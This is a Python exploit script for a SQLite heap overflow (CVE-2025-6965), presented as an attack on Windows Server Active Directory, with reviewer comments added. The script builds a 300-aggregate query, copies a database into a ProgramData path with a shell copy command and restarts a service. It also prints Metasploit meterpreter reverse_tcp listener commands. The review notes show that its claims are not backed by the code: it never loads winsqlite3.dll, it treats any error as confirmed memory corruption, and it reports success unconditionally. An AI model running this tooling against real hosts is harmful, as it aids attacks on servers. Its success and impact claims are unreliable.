# Exploit Title: SQLite 3.50.1 - Heap Overflow
# Date: 2025-11-05
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.sqlite.org
# Software Link: https://www.sqlite.org/download.html
# Version: SQLite < 3.50.2 (winsqlite3.dll)
# Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched
# CVE: CVE-2025-6965
# CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L
# Category: windows / local / dos / memory_corruption / active_directory
# Platform: Windows
# CRITICAL: This vulnerability affects ALL unpatched Windows Server instances using winsqlite3.dll
# Including: Active Directory, Group Policy, Certificate Services, and Azure AD Connect
# Impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise
# Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+
# Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965
# Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8
# OFFICIAL PoC: Triggers heap overflow in winsqlite3.dll via excessive aggregate functions
# Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services)
#
# NOTE(review): everything below runs through Python's own `sqlite3` module, which is
# linked against the SQLite library shipped with the interpreter, not against
# winsqlite3.dll. Nothing in this script loads or calls winsqlite3.dll; the claims in
# the step headers about "winsqlite3.dll context" are not backed by the code.

import sqlite3
import os
import subprocess
import sys
import time

# ===============================
# CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION
# ===============================
# Scratch database created locally by create_vulnerable_db(), then copied below.
DB_PATH = "cve_2025_6965_winsqlite3.db"
# NOTE(review): this path is asserted only by the author's comment; the page gives
# no evidence that any Windows component reads a database from it. os.makedirs()
# below creates it if absent, so its mere existence after a run is an artifact of
# this script, not of AD.
AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache" # Real AD Cache Path
AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db")
# Only printed by print_listener(); this script never opens a network connection.
LISTENER_IP = "192.168.1.100"
LISTENER_PORT = 4444
# Per the author's own comment the service does not exist on a stock host and must be
# created by the operator, so the stop/start below acts on an operator-created
# service rather than on any built-in Windows or AD service.
SERVICE_NAME = "ADSyncService" # Must be created manually: sc create ADSyncService binPath= "C:\path\to\service.exe"

# === VULNERABILITY CHECK ===
# NOTE(review): runs at import time (before the __main__ guard) and may sys.exit().
# sqlite3.sqlite_version_info is the version of the SQLite library compiled into the
# Python interpreter's _sqlite3 module; it says nothing about the winsqlite3.dll
# version on the host, so this check neither confirms nor rules out the CVE there.
print(f"[!] SQLite Version: {sqlite3.sqlite_version}")
if sqlite3.sqlite_version_info >= (3, 50, 2):
    print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected")
    print(" Update applied via Microsoft Cumulative Update (post-July 2025)")
    sys.exit(1)
else:
    print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit")

# ===============================
# STEP 1: Create Malicious AD Cache Database
# ===============================
def create_vulnerable_db() -> None:
    """Create DB_PATH with a single table ``ad_cache`` holding one row.

    Any existing file at DB_PATH is deleted first. The database itself is
    ordinary: one INTEGER PRIMARY KEY column, one INTEGER column, one row
    with ``val = 1``. Nothing "malicious" is stored in the file; the
    oversized query is built separately in generate_malicious_query().
    """
    if os.path.exists(DB_PATH):
        os.remove(DB_PATH)
    conn = sqlite3.connect(DB_PATH)
    cur = conn.cursor()
    cur.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)")
    cur.execute("INSERT INTO ad_cache (val) VALUES (1)")
    conn.commit()
    # Connection is closed unconditionally here; an exception in the statements
    # above would leave it open (no try/finally or context manager).
    conn.close()
    print(f"[+] Malicious database created: {DB_PATH}")

# ===============================
# STEP 2: Generate Truncation Payload (300+ Aggregates)
# ===============================
def generate_malicious_query(num: int = 100) -> str:
    """Return a SELECT over ``ad_cache`` with ``3 * num`` aggregate result columns.

    Each iteration contributes COUNT(*), SUM(val) and AVG(val) with distinct
    aliases (c{i}, s{i}, a{i}), so the default of 100 yields 300 aggregates.

    Args:
        num: number of COUNT/SUM/AVG triples to emit.

    Returns:
        The SQL text. With ``num == 0`` the select list is empty and the
        statement is not valid SQL.

    NOTE(review): the page does not demonstrate that a 300-term select list
    reaches the code path fixed for CVE-2025-6965; treat the "truncation"
    label as the author's claim, not as something this function proves.
    """
    agg = [f"COUNT(*) AS c{i}, SUM(val) AS s{i}, AVG(val) AS a{i}" for i in range(num)]
    return f"SELECT {', '.join(agg)} FROM ad_cache"

# ===============================
# STEP 3: Deploy + Trigger in winsqlite3.dll Context
# ===============================
def deploy_and_trigger() -> None:
    """Copy DB_PATH to AD_DB_TARGET, run the aggregate query on it, then restart SERVICE_NAME.

    Side effects observable on the host (useful as detection artifacts): creation
    of AD_CACHE_DIR, a ``copy`` via cmd.exe into AD_DB_TARGET, and ``net stop`` /
    ``net start`` of SERVICE_NAME.

    NOTE(review): the query is executed by this interpreter's bundled SQLite via
    the ``sqlite3`` module, regardless of where the database file lives. The
    location of the file does not change which library parses the query, so the
    "winsqlite3.dll context" in the step header is not established by this code.

    Raises:
        subprocess.CalledProcessError: if the ``copy`` step fails (check=True).
        NameError: if sqlite3.connect() raises, because ``conn`` is then unbound
            when the ``finally`` clause runs (see comment below).
    """
    print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}")
    os.makedirs(AD_CACHE_DIR, exist_ok=True)
    # ``copy`` is a cmd.exe builtin, hence shell=True; with shell=True the list is
    # joined into a single command line, so DB_PATH and AD_DB_TARGET are subject to
    # cmd.exe parsing. check=True makes a failed copy raise instead of continuing.
    subprocess.run(["copy", "/Y", DB_PATH, AD_DB_TARGET], shell=True, check=True)
    print(f"[+] Payload deployed to real AD path")
    query = generate_malicious_query(100)
    print(f"[*] Triggering heap overflow (300+ aggregates vs 1 column)...")
    try:
        conn = sqlite3.connect(AD_DB_TARGET)
        cur = conn.cursor()
        cur.execute(query) # TRUNCATION BUG TRIGGERED
        print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)")
    except Exception as e:
        # NOTE(review): any exception at all (file not found, locked database,
        # SQL error, ...) is reported as "HEAP OVERFLOW CONFIRMED"; the message
        # is not evidence of memory corruption. A genuine native crash would
        # typically terminate the interpreter rather than raise a Python exception.
        print(f"[!] HEAP OVERFLOW CONFIRMED: {e}")
        print(" winsqlite3.dll memory corruption triggered")
        print(" In production: AD Service Crash, DC DoS, Potential RCE")
    finally:
        # BUG: if sqlite3.connect() raised, ``conn`` was never assigned and this
        # line raises NameError from the finally clause, masking the original error.
        conn.close()
    # Force service reload (real AD services auto-query cache)
    print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...")
    try:
        subprocess.run(["net", "stop", SERVICE_NAME], shell=True, timeout=10, capture_output=True)
    except:
        # Bare except: also swallows KeyboardInterrupt and SystemExit, and hides
        # whether the stop failed or timed out.
        pass
    time.sleep(2)
    result = subprocess.run(["net", "start", SERVICE_NAME], shell=True, capture_output=True)
    if result.returncode == 0:
        print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault")
    else:
        # capture_output=True without text=True yields bytes; .decode() assumes UTF-8,
        # which may not match the console code page ``net`` writes in. A non-zero
        # exit here is expected whenever SERVICE_NAME was never created.
        print(f"[-] Service error: {result.stderr.decode()}")

# ===============================
# STEP 4: RCE Listener Setup (For Advanced Exploitation)
# ===============================
def print_listener() -> None:
    """Print a block of text containing LISTENER_IP / LISTENER_PORT.

    This function only writes to stdout; the script itself never connects to,
    listens on, or otherwise uses the address. No RCE mechanism is implemented
    anywhere on this page.
    """
    print("\n" + "="*70)
    print(" RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:")
    print("="*70)
    print("msfconsole -q")
    print("use exploit/multi/handler")
    print("set payload windows/x64/meterpreter/reverse_tcp")
    print(f"set LHOST {LISTENER_IP}")
    print(f"set LPORT {LISTENER_PORT}")
    print("exploit -j")
    print("="*70 + "\n")

# ===============================
# MAIN - EXECUTION
# ===============================
if __name__ == "__main__":
    print("="*70)
    print(" CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY")
    print(" Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation")
    print(" Author: Mohammed Idrees Banyamer (@banyamer_security)")
    print("="*70)
    create_vulnerable_db()
    deploy_and_trigger()
    print_listener()
    # NOTE(review): printed unconditionally once deploy_and_trigger() returns;
    # nothing above checks whether any fault actually occurred.
    print("[+] EXPLOIT EXECUTED SUCCESSFULLY")
    print(" Check Event Viewer: Application Log → winsqlite3.dll Access Violation (0xC0000005)")
    print(" Fix: Apply latest Windows Cumulative Update IMMEDIATELY")
    print(" All Domain Controllers must be patched within 24 hours")